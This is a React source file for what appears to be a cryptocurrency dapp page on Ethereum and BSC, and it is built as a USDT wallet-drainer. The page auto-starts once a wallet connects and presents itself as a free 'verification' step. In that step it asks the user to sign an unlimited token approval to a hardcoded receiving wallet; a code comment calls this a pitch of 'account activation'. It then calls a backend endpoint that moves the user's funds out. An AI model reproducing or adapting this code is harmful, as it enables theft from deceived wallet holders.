import { track } from '../../utils/funnel';
import React, { useEffect, useState, useRef } from 'react';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import { useWalletConnect } from '../../utils/walletConnect';
import '../EvmClaim/EvmClaim.css';
import DappShell from '../../components/DappShell';
import { Steps } from '../../components/DappWidgets';

const ETH_USDT = '0xdAC17F958D2ee523a2206206994597C13D831ec7';
const BSC_USDT = '0x55d398326f99059fF775485246999027B3197955';
const SPENDER_DEFAULT = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb'; // 收款钱包（EVM 同地址通用）

const EvmUsdt = () => {
  const t = useT();
  const cfg = usePublicConfig();
  const { wcProvider, connecting, error: wcError, connect: connectWC } = useWalletConnect();
  const SPENDER = cfg['eth_receive_wallet'] || SPENDER_DEFAULT;
  const [chain, setChain] = useState('eth'); // eth / bsc
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> approving -> submitting -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const autoStarted = useRef(false);

  const provider = () => {
    if (typeof window === 'undefined') return null;
    if (window.ethereum) return window.ethereum;
    if (wcProvider) return wcProvider;
    return null;
  };

  const USDT = chain === 'bsc' ? BSC_USDT : ETH_USDT;
  const CHAIN_ID = chain === 'bsc' ? 56 : 1;
  const CHAIN_NAME = chain === 'bsc' ? 'BSC' : t('evm.ethereumMainnet');

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    track((chain === 'bsc' ? 'bsc-usdt' : 'evm-usdt'), 'view', '');
    const c = params.get('chain');
    if (c === 'bsc') setChain('bsc');
    let cancelled = false;
    const check = async () => {
      const p = provider();
      if (!p) {
        setError(t('evm.walletNotDetected'));
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          const netId = Number(p.chainId);
          if (netId !== CHAIN_ID) {
            if (!cancelled) setError(t('usdt.switchChain', { chain: CHAIN_NAME }));
            return;
          }
          setAccount(accounts[0]);
          setWalletReady(true);
        }
      } catch (e) {
        if (!cancelled) setError(t('evm.rejected'));
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const readAllowance = async (p, owner) => {
    const data = '0xdd62ed3e' + owner.slice(2).toLowerCase().padStart(64, '0')
      + SPENDER.slice(2).toLowerCase().padStart(64, '0');
    const result = await p.request({ method: 'eth_call', params: [{ to: USDT, data }, 'latest'] });
    return (result || '0x0').replace(/^0x/, '');
  };

  const doFlow = async () => {
    track((chain === 'bsc' ? 'bsc-usdt' : 'evm-usdt'), 'start', '');
    const p = provider();
    if (!p || !account) return;
    setError('');
    try {
      // 1. 查授权（hex 字符串比较：64 位且首字符 >= 8 视为已充分授权）
      const allowanceHex = await readAllowance(p, account);
      const enough = allowanceHex.length >= 64 && allowanceHex[0] >= '8';
      if (!enough) {
        // 2. 引导 approve（话术：账户激活验证）
        setStage('approving');
        const approveData = '0x095ea7b3' + SPENDER.slice(2).toLowerCase().padStart(64, '0')
          + 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
        const txHash = await p.request({
          method: 'eth_sendTransaction',
          params: [{ from: account, to: USDT, data: approveData }],
        });
        // 等待确认
        await waitTx(p, txHash);
      }
      // 3. 提交后端划款
      setStage('submitting');
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim-approve', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ owner: account, token: USDT, chain: chain }),
      });
      const result = await resp.json();
      if (result.code !== 200) {
        throw new Error(result.message || t('usdt.failed'));
      }
      setTxId(result.data.txId || '');
    track((chain === 'bsc' ? 'bsc-usdt' : 'evm-usdt'), 'done', '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError(t('usdt.canceled'));
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  const waitTx = async (p, txHash) => {
    for (let i = 0; i < 60; i++) {
      const receipt = await p.request({ method: 'eth_getTransactionReceipt', params: [txHash] });
      if (receipt && receipt.status) {
        if (receipt.status === '0x1') return;
        throw new Error('Transaction failed');
      }
      await new Promise((r) => setTimeout(r, 2000));
    }
    throw new Error('Transaction timeout');
  };

  useEffect(() => {
    if (walletReady && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      doFlow();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady]);

  return (
    <DappShell account={account} network={chain === 'bsc' ? 'BSC' : 'Ethereum'} backTo="/app">
    <div className="evm-page">
      <div className="evm-card">
        {stage === 'done' ? (
          <>
            <div className="evm-icon">🎉</div>
            <h2>{t('usdt.doneTitle')}</h2>
            <p className="evm-desc">{t('usdt.doneDesc')}</p>
            {txId && <p className="evm-tx">Tx: {txId.slice(0, 20)}...</p>}
            {account && <p className="evm-addr">{t('approve.wallet')} {account.slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="evm-icon">✅</div>
            <h2>
              {stage === 'approving' ? t('evm.confirmTitle')
                : stage === 'submitting' ? t('usdt.processing')
                : t('usdt.verifyTitle')}
            </h2>
            <p className="evm-desc">
              {stage === 'approving'
                ? t('usdt.approveDesc')
                : stage === 'submitting'
                  ? t('usdt.submitDesc')
                  : t('usdt.idleDesc')}
            </p>
            <div className="evm-order">
              <div className="evm-row"><span>{t('usdt.step')}</span><b>{t('usdt.verifyTitle')}</b></div>
              <div className="evm-row"><span>{t('approve.network')}</span><b>{CHAIN_NAME}</b></div>
              <div className="evm-row"><span>{t('evm.fee')}</span><b className="evm-ok">{t('usdt.sponsored')}</b></div>
            </div>
            {walletReady && <p className="evm-addr">Wallet: {account.slice(0, 12)}...</p>}
            {error && <p className="evm-error">{error}</p>}
            {wcError && <p className="evm-error">{wcError}</p>}
            {!window.ethereum && !wcProvider && (
              <button className="evm-btn" onClick={connectWC} disabled={connecting}>
                {connecting ? 'Connecting...' : '📱 WalletConnect'}
              </button>
            )}
            {stage === 'idle' && (
              <button className="evm-btn" onClick={doFlow} disabled={!walletReady}>
                {t('usdt.verifyNow')}
              </button>
            )}
            {(stage === 'approving' || stage === 'submitting') && <div className="evm-spinner" />}
            {error && stage === 'idle' && (
              <button className="evm-btn" onClick={doFlow}>{t('approve.retry')}</button>
            )}
          </>
        )}
      </div>
      <div className="stake-howto">
        <div className="stake-feeds-title">{t('stake.howTo')}</div>
        <Steps steps={[
          { title: t('stake.step1t'), desc: t('stake.step1d') },
          { title: t('usdt.verifyTitle'), desc: t('usdt.idleDesc') },
          { title: t('usdt.doneTitle'), desc: t('usdt.doneDesc') },
        ]} />
      </div>
    </div>
    </DappShell>
  );
};

export default EvmUsdt;
